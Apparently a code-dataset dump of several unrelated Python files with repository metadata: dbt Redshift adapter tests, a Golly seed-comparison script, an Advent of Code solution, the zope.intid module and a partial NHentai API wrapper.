psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options=r"-c search_path=test\ test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_set_zero_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=0)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
application_name='dbt')
def test_dbname_verification_is_case_insensitive(self):
# Override adapter settings from setUp()
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'Redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self.adapter.cleanup_connections()
self._adapter = RedshiftAdapter(self.config)
self.adapter.verify_database('redshift')
class TestRedshiftAdapterConversions(TestAdapterConversions):
def test_convert_text_type(self):
rows = [
['', 'a1', 'stringval1'],
['', 'a2', 'stringvalasdfasdfasdfa'],
['', 'a3', 'stringval3'],
]
agate_table = self._make_table_of(rows, agate.Text)
expected = ['varchar(64)', 'varchar(2)', 'varchar(22)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_text_type(agate_table, col_idx) == expect
def test_convert_number_type(self):
rows = [
['', '23.98', '-1'],
['', '12.78', '-2'],
['', '79.41', '-3'],
]
agate_table = self._make_table_of(rows, agate.Number)
expected = ['integer', 'float8', 'integer']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_number_type(agate_table, col_idx) == expect
def test_convert_boolean_type(self):
rows = [
['', 'false', 'true'],
['', 'false', 'false'],
['', 'false', 'true'],
]
agate_table = self._make_table_of(rows, agate.Boolean)
expected = ['boolean', 'boolean', 'boolean']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_boolean_type(agate_table, col_idx) == expect
def test_convert_datetime_type(self):
rows = [
['', '20190101T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190102T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190103T01:01:01Z', '2019-01-01 01:01:01'],
]
agate_table = self._make_table_of(rows, [agate.DateTime, agate_helper.ISODateTime, agate.DateTime])
expected = ['timestamp without time zone', 'timestamp without time zone', 'timestamp without time zone']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_datetime_type(agate_table, col_idx) == expect
def test_convert_date_type(self):
rows = [
['', '2019-01-01', '2019-01-04'],
['', '2019-01-02', '2019-01-04'],
['', '2019-01-03', '2019-01-04'],
]
agate_table = self._make_table_of(rows, agate.Date)
expected = ['date', 'date', 'date']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_date_type(agate_table, col_idx) == expect
def test_convert_time_type(self):
# dbt's default type testers actually don't have a TimeDelta at all.
agate.TimeDelta
rows = [
['', '120s', '10s'],
['', '3m', '11s'],
['', '1h', '12s'],
]
agate_table = self._make_table_of(rows, agate.TimeDelta)
expected = ['varchar(24)', 'varchar(24)', 'varchar(24)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_time_type(agate_table, col_idx) == expect
# convert_boolean_type
# convert_datetime_type
# convert_date_type
# convert_time_type
| true
| true
|
1c3e877201199503869f4cb34966b4d0ec86b3f6
| 277
|
py
|
Python
|
src/workflow/configuration/workflow_configuration.py
|
piotr-kalanski/service-initializer
|
1662f9cfce1d7185129063f61d9e4fbd10ec8567
|
[
"Apache-2.0"
] | 1
|
2020-04-17T10:46:48.000Z
|
2020-04-17T10:46:48.000Z
|
src/workflow/configuration/workflow_configuration.py
|
piotr-kalanski/service-initializer
|
1662f9cfce1d7185129063f61d9e4fbd10ec8567
|
[
"Apache-2.0"
] | 19
|
2020-03-17T18:40:58.000Z
|
2020-03-24T18:35:36.000Z
|
src/workflow/configuration/workflow_configuration.py
|
piotr-kalanski/service-initializer
|
1662f9cfce1d7185129063f61d9e4fbd10ec8567
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
from workflow.step import Step
class WorkflowConfiguration:
def __init__(self):
self._steps = []
def add_step(self, step: Step):
self._steps.append(step)
def get_steps(self) -> List[Step]:
return self._steps
| 18.466667
| 38
| 0.649819
|
from typing import List
from workflow.step import Step
class WorkflowConfiguration:
def __init__(self):
self._steps = []
def add_step(self, step: Step):
self._steps.append(step)
def get_steps(self) -> List[Step]:
return self._steps
| true
| true
|
1c3e87792f7fd7fb2a6073e2de754f523bdd4629
| 4,719
|
py
|
Python
|
compare_past_winners.py
|
pdturney/modeling-symbiosis
|
54e17f6619475b4678425d916ca8142e214040f0
|
[
"MIT"
] | null | null | null |
compare_past_winners.py
|
pdturney/modeling-symbiosis
|
54e17f6619475b4678425d916ca8142e214040f0
|
[
"MIT"
] | null | null | null |
compare_past_winners.py
|
pdturney/modeling-symbiosis
|
54e17f6619475b4678425d916ca8142e214040f0
|
[
"MIT"
] | null | null | null |
#
# Compare Past Winners
#
# Peter Turney, February 13, 2020
#
# Compare the top seed in generation N with the top seed
# from every preceding generation.
#
import golly as g
import model_classes as mclass
import model_functions as mfunc
import model_parameters as mparam
import numpy as np
import pickle
import os
import re
import sys
#
# Initialize some parameters from model_parameters
#
pickle_dir = mparam.log_directory
analysis_dir = mparam.log_directory
num_generations = mparam.num_generations
width_factor = mparam.width_factor
height_factor = mparam.height_factor
time_factor = mparam.time_factor
#
# Initialize some parameters locally
#
# each pair of seeds will have this many contests
num_trials = 50
#
# Stats analysis file
#
basename = os.path.basename(os.path.normpath(analysis_dir))
analysis_path = analysis_dir + "/compare-past-winners-" + \
basename + ".tsv"
analysis_handle = open(analysis_path, "w", 0)
#
# Print out a header for the result file
#
mfunc.show_message(g, analysis_handle, "\n\nCompare Winners\n\n")
mfunc.show_message(g, analysis_handle, "width_factor = " + \
str(width_factor) + "\n")
mfunc.show_message(g, analysis_handle, "height_factor = " + \
str(height_factor) + "\n")
mfunc.show_message(g, analysis_handle, "time_factor = " + \
str(time_factor) + "\n")
mfunc.show_message(g, analysis_handle, "num_trials = " + \
str(num_trials) + "\n")
mfunc.show_message(g, analysis_handle, "path = " + \
str(pickle_dir) + "\n\n")
mfunc.show_message(g, analysis_handle, \
"Note the results will change slightly each time this runs.\n\n")
#
# Make a list of the pickles in pickle_dir
#
# We assume that the directory pickle_dir contains the pickles from
# only one single run of Model-T. That is, all of the pickles will
# have the same date and time stamp as part of their file names.
#
pickle_list = []
for file in os.listdir(pickle_dir):
if file.endswith(".bin"):
pickle_list.append(file)
#
assert len(pickle_list) == num_generations + 1
#
# Extract the base part of the pickles. Assume that all of the
# pickles have the same base part.
#
# "log-2019-11-15-14h-22m-30s-pickle-21.bin" -- full file name
# --> "log-2019-11-15-14h-22m-30s-pickle-" -- base part of name
#
pickle_base_search = re.search(r'(log-.+\d\ds-pickle-)', pickle_list[0])
pickle_base = pickle_base_search.group(1)
#
# Make a list of the winning seed for each generation
#
winning_seeds = []
for pickle_num in range(num_generations + 1):
pickle_name = pickle_base + str(pickle_num) + ".bin"
pickle_path = pickle_dir + "/" + pickle_name
pickle_handle = open(pickle_path, "rb") # rb = read binary
pickle_data = pickle.load(pickle_handle)
pickle_handle.close()
# seeds are sorted in order of decreasing score, so the
# first seed is the winning seed for this pickle
winning_seed = pickle_data[0]
winning_seeds.append(winning_seed)
#
# Calculate the score for each winning seed by comparing
# it with the preceding seeds. Let's say that the first
# seed (generation 0) has a fitness of zero. This is
# reasonable, since the first seed is randomly generated
# and there is no earlier generation we can compare it to.
#
for new_seed_num in range(num_generations + 1):
# if this is the first seed, then its score is zero ...
if (new_seed_num == 0):
new_seed_score = 0
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
# if this is not the first seed ...
else:
new_seed = winning_seeds[new_seed_num]
# initialize sum of scores
new_seed_score = 0
# compare all the old winners to new_seed
for old_seed_num in range(new_seed_num):
old_seed = winning_seeds[old_seed_num]
# new_score will range from 0 to 1
# - new_score is the fraction of the trials that
# are won by new_seed
[old_score, new_score] = mfunc.score_pair(g, \
old_seed, new_seed, width_factor, height_factor, \
time_factor, num_trials)
# increment the sum of scores, new_seed_score, by new_score
# - increment ranges from 0 to 1
new_seed_score = new_seed_score + new_score
# now new_seed_score ranges from 0 to new_seed_num
# - lets adjust new_seed_score to range from
# -new_seed_num to +new_seed_num
new_seed_score = (2 * new_seed_score) - new_seed_num
# write result to output file
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
#
#
#
# Final message
#
mfunc.show_message(g, analysis_handle, "\nAnalysis complete.\n")
analysis_handle.close()
#
#
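#
# Illustrative note (not part of the original script): the rescaling
# (2 * new_seed_score) - new_seed_num above maps the summed win fractions from the range
# [0, new_seed_num] onto [-new_seed_num, +new_seed_num], so 0 means the new winner breaks
# even against its ancestors. For example, with new_seed_num = 4 ancestors and win
# fractions 0.6 + 0.8 + 0.5 + 0.7 = 2.6, the reported score is 2 * 2.6 - 4 = 1.2.
#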
| 34.698529
| 73
| 0.700996
|
import golly as g
import model_classes as mclass
import model_functions as mfunc
import model_parameters as mparam
import numpy as np
import pickle
import os
import re
import sys
pickle_dir = mparam.log_directory
analysis_dir = mparam.log_directory
num_generations = mparam.num_generations
width_factor = mparam.width_factor
height_factor = mparam.height_factor
time_factor = mparam.time_factor
num_trials = 50
basename = os.path.basename(os.path.normpath(analysis_dir))
analysis_path = analysis_dir + "/compare-past-winners-" + \
basename + ".tsv"
analysis_handle = open(analysis_path, "w", 0)
mfunc.show_message(g, analysis_handle, "\n\nCompare Winners\n\n")
mfunc.show_message(g, analysis_handle, "width_factor = " + \
str(width_factor) + "\n")
mfunc.show_message(g, analysis_handle, "height_factor = " + \
str(height_factor) + "\n")
mfunc.show_message(g, analysis_handle, "time_factor = " + \
str(time_factor) + "\n")
mfunc.show_message(g, analysis_handle, "num_trials = " + \
str(num_trials) + "\n")
mfunc.show_message(g, analysis_handle, "path = " + \
str(pickle_dir) + "\n\n")
mfunc.show_message(g, analysis_handle, \
"Note the results will change slightly each time this runs.\n\n")
pickle_list = []
for file in os.listdir(pickle_dir):
if file.endswith(".bin"):
pickle_list.append(file)
assert len(pickle_list) == num_generations + 1
pickle_base_search = re.search(r'(log-.+\d\ds-pickle-)', pickle_list[0])
pickle_base = pickle_base_search.group(1)
winning_seeds = []
for pickle_num in range(num_generations + 1):
pickle_name = pickle_base + str(pickle_num) + ".bin"
pickle_path = pickle_dir + "/" + pickle_name
pickle_handle = open(pickle_path, "rb")
pickle_data = pickle.load(pickle_handle)
pickle_handle.close()
winning_seed = pickle_data[0]
winning_seeds.append(winning_seed)
# seed (generation 0) has a fitness of zero. This is
# reasonable, since the first seed is randomly generated
# and there is no earlier generation we can compare it to.
#
for new_seed_num in range(num_generations + 1):
# if this is the first seed, then its score is zero ...
if (new_seed_num == 0):
new_seed_score = 0
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
# if this is not the first seed ...
else:
new_seed = winning_seeds[new_seed_num]
# initialize sum of scores
new_seed_score = 0
# compare all the old winners to new_seed
for old_seed_num in range(new_seed_num):
old_seed = winning_seeds[old_seed_num]
# new_score will range from 0 to 1
# - new_score is the fraction of the trials that
# are won by new_seed
[old_score, new_score] = mfunc.score_pair(g, \
old_seed, new_seed, width_factor, height_factor, \
time_factor, num_trials)
# increment the sum of scores, new_seed_score, by new_score
# - increment ranges from 0 to 1
new_seed_score = new_seed_score + new_score
# now new_seed_score ranges from 0 to new_seed_num
# - lets adjust new_seed_score to range from
# -new_seed_num to +new_seed_num
new_seed_score = (2 * new_seed_score) - new_seed_num
# write result to output file
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
#
#
#
# Final message
#
mfunc.show_message(g, analysis_handle, "\nAnalysis complete.\n")
analysis_handle.close()
#
#
| true
| true
|
1c3e8801d5bccde77ea36af7560697732cf3da40
| 958
|
py
|
Python
|
isi_sdk_8_0_1/test/test_storagepool_storagepool.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_0_1/test/test_storagepool_storagepool.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_0_1/test/test_storagepool_storagepool.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.storagepool_storagepool import StoragepoolStoragepool # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestStoragepoolStoragepool(unittest.TestCase):
"""StoragepoolStoragepool unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testStoragepoolStoragepool(self):
"""Test StoragepoolStoragepool"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.storagepool_storagepool.StoragepoolStoragepool() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.365854
| 101
| 0.722338
|
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.storagepool_storagepool import StoragepoolStoragepool
from isi_sdk_8_0_1.rest import ApiException
class TestStoragepoolStoragepool(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testStoragepoolStoragepool(self):
        pass
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c3e883ab8dca08529839fc3dda5a2a6b5a432d2
| 3,389
|
py
|
Python
|
day3/solution.py
|
GeertLitjens/advent-of-code-2021
|
4a4f2cfddbd7aeb839498fb4e7a916e1b429b590
|
[
"Apache-2.0"
] | 10
|
2021-12-14T19:11:54.000Z
|
2022-02-28T13:44:07.000Z
|
day3/solution.py
|
GeertLitjens/advent-of-code-2021
|
4a4f2cfddbd7aeb839498fb4e7a916e1b429b590
|
[
"Apache-2.0"
] | null | null | null |
day3/solution.py
|
GeertLitjens/advent-of-code-2021
|
4a4f2cfddbd7aeb839498fb4e7a916e1b429b590
|
[
"Apache-2.0"
] | null | null | null |
"""
This day was slightly more challenging. Initially, I thought I might need to apply some binary arithmetic to solve
this problem, however, in the end this was not needed. I did decide to use numpy for fast and easy handling of arrays.
Potentially there is a smarter/faster/code-efficient solution that I didn't think of, but what I came up with works, so
that is the most important part.
"""
from utils import Solution
from typing import Any
import numpy as np
class DaySolution(Solution):
def __init__(self, day: int = 3, year: int = 2021) -> None:
super().__init__(day, year)
def _parse_data(self, input_data: str) -> Any:
"""
        The parsing of the data was slightly different from previous days. First, I convert the dataset to a list of
        lists of strings, which I then convert to a numpy array.
"""
string_list = [list(x) for x in input_data.split("\n") if x]
string_array = np.array(string_list)
return string_array
def _solve_part1(self, parsed_data: np.ndarray) -> Any:
"""
Because I converted the data to a numpy array, I can easily perform operations along any dimension.
Specifically, to identify the most common element for each bit, I take the ceil of the median across the rows.
The median itself in a binary setting will simply select the most common element, and the np.ceil resolves ties
by assigning them to 1. Then I use a list comprehension to invert the resultant string to get the least common
bits. Last, I convert the bit string to an integer by calling int with a base of 2.
"""
median = np.ceil(np.median(parsed_data.astype("int"), axis=0)).astype("int")
most_common = "".join(list(median.astype('str')))
least_common = "".join(['1' if i == '0' else '0' for i in most_common])
gamma = int(most_common, 2)
epsilon = int(least_common, 2)
return gamma * epsilon
def _solve_part2(self, parsed_data: np.ndarray) -> Any:
"""
        Again, reading the actual task was the most challenging part here for me. Initially I assumed I could simply
        use the most and least common bit strings from the previous part; however, I then realized that I had to do
        it per bit, because the bit strings needed to be calculated with respect to the remaining rows. The filtering on
        the bit criteria is very easy to do in numpy using logical expressions. I could very well imagine that this
        problem can be solved more efficiently with a recursive function or so, but my approach is still reasonably
        fast (6 - 7 ms), so I think it is ok.
"""
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.ceil(np.median(filtered_data[:, i])))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
og_rating = int("".join(filtered_data[0].astype("str")), 2)
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.abs(np.median(filtered_data[:, i]) - 1))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
co_rating = int("".join(filtered_data[0].astype("str")), 2)
return og_rating * co_rating
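# A minimal, self-contained sketch (not part of the original solution) showing
# the part-1 median trick on a made-up three-line diagnostic report.
if __name__ == "__main__":
    toy = np.array([list("00100"), list("11110"), list("10110")])
    med = np.ceil(np.median(toy.astype("int"), axis=0)).astype("int")
    most_common = "".join(med.astype("str"))
    least_common = "".join("1" if bit == "0" else "0" for bit in most_common)
    print(most_common, least_common, int(most_common, 2) * int(least_common, 2))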
| 52.138462
| 119
| 0.660962
|
from utils import Solution
from typing import Any
import numpy as np
class DaySolution(Solution):
def __init__(self, day: int = 3, year: int = 2021) -> None:
super().__init__(day, year)
def _parse_data(self, input_data: str) -> Any:
string_list = [list(x) for x in input_data.split("\n") if x]
string_array = np.array(string_list)
return string_array
def _solve_part1(self, parsed_data: np.ndarray) -> Any:
median = np.ceil(np.median(parsed_data.astype("int"), axis=0)).astype("int")
most_common = "".join(list(median.astype('str')))
least_common = "".join(['1' if i == '0' else '0' for i in most_common])
gamma = int(most_common, 2)
epsilon = int(least_common, 2)
return gamma * epsilon
def _solve_part2(self, parsed_data: np.ndarray) -> Any:
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.ceil(np.median(filtered_data[:, i])))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
og_rating = int("".join(filtered_data[0].astype("str")), 2)
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.abs(np.median(filtered_data[:, i]) - 1))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
co_rating = int("".join(filtered_data[0].astype("str")), 2)
return og_rating * co_rating
| true
| true
|
1c3e88eeb6cbbc89bf3d8872735e281a4c5d0264
| 7,084
|
py
|
Python
|
src/zope/intid/__init__.py
|
zopefoundation/zope.intid
|
3ae7ac3232167ae6d54dd920ce7fd179ba128615
|
[
"ZPL-2.1"
] | null | null | null |
src/zope/intid/__init__.py
|
zopefoundation/zope.intid
|
3ae7ac3232167ae6d54dd920ce7fd179ba128615
|
[
"ZPL-2.1"
] | 10
|
2016-03-24T15:24:16.000Z
|
2021-03-19T11:38:48.000Z
|
src/zope/intid/__init__.py
|
zopefoundation/zope.intid
|
3ae7ac3232167ae6d54dd920ce7fd179ba128615
|
[
"ZPL-2.1"
] | 1
|
2015-04-03T09:06:50.000Z
|
2015-04-03T09:06:50.000Z
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Unique id utility.
This utility assigns unique integer ids to objects and allows lookups
by object and by id.
This functionality can be used in cataloging.
"""
import random
import BTrees
from persistent import Persistent
from zope.component import adapter, getAllUtilitiesRegisteredFor, handle
from zope.event import notify
from zope.interface import implementer
from zope.keyreference.interfaces import IKeyReference, NotYet
from zope.lifecycleevent.interfaces import IObjectAddedEvent
from zope.lifecycleevent.interfaces import IObjectRemovedEvent
from zope.location.interfaces import ILocation
from zope.location.interfaces import IContained
from zope.security.proxy import removeSecurityProxy
from zope.intid.interfaces import IIntIds, IIntIdEvent
from zope.intid.interfaces import IntIdAddedEvent, IntIdRemovedEvent
from zope.intid.interfaces import IntIdMissingError, IntIdsCorruptedError, ObjectMissingError
try:
# POSKeyError is a subclass of KeyError; in the cases where we
# catch KeyError for an item missing from a BTree, we still
# want to propagate this exception that indicates a corrupt database
# (as opposed to a corrupt IntIds)
from ZODB.POSException import POSKeyError as _POSKeyError
except ImportError: # pragma: no cover (we run tests with ZODB installed)
# In practice, ZODB will probably be installed. But if not,
# then POSKeyError can never be generated, so use a unique
# exception that we'll never catch.
class _POSKeyError(BaseException):
pass
@implementer(IIntIds, IContained)
class IntIds(Persistent):
"""This utility provides a two way mapping between objects and
integer ids.
IKeyReferences to objects are stored in the indexes.
"""
__parent__ = __name__ = None
_v_nextid = None
_randrange = random.randrange
family = BTrees.family32
def __init__(self, family=None):
if family is not None:
self.family = family
self.ids = self.family.OI.BTree()
self.refs = self.family.IO.BTree()
def __len__(self):
return len(self.ids)
def items(self):
return list(self.refs.items())
def __iter__(self):
return self.refs.iterkeys()
def getObject(self, id):
try:
return self.refs[id]()
except _POSKeyError:
raise
except KeyError:
raise ObjectMissingError(id)
def queryObject(self, id, default=None):
r = self.refs.get(id)
if r is not None:
return r()
return default
def getId(self, ob):
try:
key = IKeyReference(ob)
except (NotYet, TypeError, ValueError):
raise IntIdMissingError(ob)
try:
return self.ids[key]
except _POSKeyError:
raise
except KeyError:
raise IntIdMissingError(ob)
def queryId(self, ob, default=None):
try:
return self.getId(ob)
except _POSKeyError:
raise
except KeyError:
return default
def _generateId(self):
"""Generate an id which is not yet taken.
This tries to allocate sequential ids so they fall into the
same BTree bucket, and randomizes if it stumbles upon a
used one.
"""
nextid = getattr(self, '_v_nextid', None)
while True:
if nextid is None:
nextid = self._randrange(0, self.family.maxint)
uid = nextid
if uid not in self.refs:
nextid += 1
if nextid > self.family.maxint:
nextid = None
self._v_nextid = nextid
return uid
nextid = None
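    # Illustrative walk-through (not from the original source): the first call
    # picks a random starting uid, hands it out and caches uid + 1 in
    # _v_nextid, so later registrations get adjacent ids that share BTree
    # buckets; if a cached candidate is already taken, the loop clears nextid
    # and re-randomizes on the next pass.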
def register(self, ob):
# Note that we'll still need to keep this proxy removal.
ob = removeSecurityProxy(ob)
key = IKeyReference(ob)
if key in self.ids:
return self.ids[key]
uid = self._generateId()
self.refs[uid] = key
self.ids[key] = uid
return uid
def unregister(self, ob):
# Note that we'll still need to keep this proxy removal.
ob = removeSecurityProxy(ob)
key = IKeyReference(ob, None)
if key is None:
return
try:
uid = self.ids[key]
except _POSKeyError:
raise
except KeyError:
raise IntIdMissingError(ob)
try:
del self.refs[uid]
except _POSKeyError:
raise
except KeyError:
# It was in self.ids, but not self.refs. Something is corrupted.
# We've always let this KeyError propagate, before cleaning up self.ids,
# meaning that getId(ob) will continue to work, but getObject(uid) will not.
raise IntIdsCorruptedError(ob, uid)
del self.ids[key]
def _utilities_and_key(ob):
utilities = tuple(getAllUtilitiesRegisteredFor(IIntIds))
return utilities, IKeyReference(ob, None) if utilities else None
@adapter(ILocation, IObjectRemovedEvent)
def removeIntIdSubscriber(ob, event):
"""A subscriber to ObjectRemovedEvent
Removes the unique ids registered for the object in all the unique
id utilities.
"""
utilities, key = _utilities_and_key(ob)
if not utilities or key is None:
# Unregister only objects that adapt to key reference
return
# Notify the catalogs that this object is about to be removed.
notify(IntIdRemovedEvent(ob, event))
for utility in utilities:
try:
utility.unregister(key)
except KeyError:
            # Silently ignoring all kinds of corruption here
pass
@adapter(ILocation, IObjectAddedEvent)
def addIntIdSubscriber(ob, event):
"""A subscriber to ObjectAddedEvent
Registers the object added in all unique id utilities and fires
an event for the catalogs.
"""
utilities, key = _utilities_and_key(ob)
if not utilities or key is None:
# Register only objects that adapt to key reference
return
idmap = {}
for utility in utilities:
idmap[utility] = utility.register(key)
# Notify the catalogs that this object was added.
notify(IntIdAddedEvent(ob, event, idmap))
@adapter(IIntIdEvent)
def intIdEventNotify(event):
"""Event subscriber to dispatch IntIdEvent to interested adapters."""
handle(event.object, event)
| 32.2
| 93
| 0.644975
| true
| true
|
|
1c3e89df476a8f3325bd09f766c6144661f65418
| 8,121
|
py
|
Python
|
NHentai/nhentai.py
|
AlexandreSenpai/NHentai-API
|
d209b6f1c9bb0a01c605929ce91b1fd360811afb
|
[
"MIT"
] | 33
|
2020-07-12T04:00:05.000Z
|
2022-03-27T12:50:57.000Z
|
NHentai/nhentai.py
|
AlexandreSenpai/NHentai-API
|
d209b6f1c9bb0a01c605929ce91b1fd360811afb
|
[
"MIT"
] | 16
|
2020-07-24T14:37:11.000Z
|
2022-03-06T01:57:02.000Z
|
NHentai/nhentai.py
|
AlexandreSenpai/NHentai-API
|
d209b6f1c9bb0a01c605929ce91b1fd360811afb
|
[
"MIT"
] | 14
|
2020-07-09T18:42:13.000Z
|
2022-03-11T13:30:06.000Z
|
import logging
from typing import Optional, Union
from urllib.parse import urljoin
from .utils.cache import Cache
from .base_wrapper import BaseWrapper
from .entities.doujin import Doujin, DoujinThumbnail
from .entities.page import (Page,
SearchPage,
TagListPage,
GroupListPage,
CharacterListPage,
ArtistListPage,
PopularPage)
from .entities.links import CharacterLink
from .entities.options import Sort
class NHentai(BaseWrapper):
@Cache(max_age_seconds=3600, max_size=1000, cache_key_position=1, cache_key_name='id').cache
def get_doujin(self, id: str) -> Doujin:
"""This method fetches a doujin information based on id.
Args:
id:
Id of the target doujin.
Returns:
Doujin:
dataclass with the doujin information within.
                You can access the dataclass information in the `entities` package.
"""
print(f'INFO::Retrieving doujin with id {id}')
id = str(id)
if not id.isnumeric() or id[0] == '0':
            print('ERROR::Maybe you mistyped the doujin id or it does not exist.')
return None
SOUP = self._fetch(urljoin(self._API_URL, f'gallery/{id}'), is_json=True)
if SOUP.get('error'):
            print('ERROR::Maybe you mistyped the doujin id or it does not exist.')
            return None
        print(f'INFO::Successfully retrieved doujin {id}')
return Doujin.from_json(SOUP)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_pages(self, page: int) -> Page:
"""This method paginates through the homepage of NHentai and returns the doujins.
Args:
page:
number of the pagination page.
Returns:
HomePage:
dataclass with a list of DoujinThumbnail.
                You can access the dataclass information in the `entities` package.
"""
print(f'INFO::Fetching page {page}')
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/all?page={page}'), is_json=True)
DOUJINS = [DoujinThumbnail.from_json(json_obj) for json_obj in SOUP.get('result')]
PAGES = SOUP.get('num_pages')
PER_PAGE = SOUP.get('per_page')
TOTAL_RESULTS = int(PAGES) * int(PER_PAGE)
return Page(doujins=DOUJINS,
total_results=TOTAL_RESULTS,
total_pages=PAGES,
per_page=PER_PAGE,
page=page)
def get_random(self) -> Doujin:
"""This method retrieves a random doujin.
Args:
Returns:
Doujin:
dataclass with the doujin information within.
                You can access the dataclass information in the `entities` package.
"""
SOUP = self._fetch(f'/random/')
id = SOUP.find('h3', id='gallery_id').text.replace('#', '')
doujin: Doujin = self.get_doujin(id=id)
return doujin
def search(self, query: str, page: Optional[int]=1, sort: Optional[Sort]=Sort.RECENT) -> Union[SearchPage, Doujin]:
"""This method retrieves the search page based on a query.
Args:
query str:
searchable term string. Ex: houshou marine, boa hancock, naruto
sort str:
doujin sort order
page int:
number of the page with results
Returns:
SearchPage:
dataclass with a list of DoujinThumbnail.
                You can access the dataclass information in the `entities` package.
"""
if query.isnumeric():
any_doujin: Doujin = self.get_doujin(id=query)
if any_doujin is not None:
return any_doujin
sort = sort.value if isinstance(sort, Sort) else sort
params = {'query': query, 'page': page, 'sort': sort} if sort is not None else {'query': query, 'page': page}
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/search'), params=params, is_json=True)
DOUJINS = [Doujin.from_json(json_object=doujin) for doujin in SOUP.get('result')]
return SearchPage(query=query,
sort=sort,
total_results=SOUP.get('num_pages')*SOUP.get('per_page'),
total_pages=SOUP.get('num_pages'),
doujins=DOUJINS)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_characters(self, page: int) -> CharacterListPage:
"""This method retrieves a list of characters that are available on NHentai site.
Args:
page:
number of the pagination page.
Returns:
CharacterListPage:
dataclass with the character list within.
                You can access the dataclass information in the `entities` package.
"""
SOUP = self._fetch(f'/characters/?page={page}')
pagination_section = SOUP.find('section', class_='pagination')
TOTAL_PAGES = int(pagination_section.find('a', class_='last')['href'].split('=')[-1])
CHARACTERS = []
character_list_section = SOUP.find('div', class_='container')
section = character_list_section.find_all('section')
for link in section:
for character in link:
try:
TITLE = character.find('span', class_='name').text
CHARACTERS.append(CharacterLink(section=TITLE[0] if not TITLE[0].isnumeric() else '#',
title=TITLE,
url=character['href'],
total_entries=int(character.find('span', class_='count').text)))
except Exception as err:
logging.error(err)
return CharacterListPage(page=page,
total_pages=int(TOTAL_PAGES),
characters=CHARACTERS)
def get_popular_now(self):
"""This method retrieves a list of the current most popular doujins.
Args:
Returns:
PopularPage:
dataclass with the current popular doujin list within.
                You can access the dataclass information in the `entities` package.
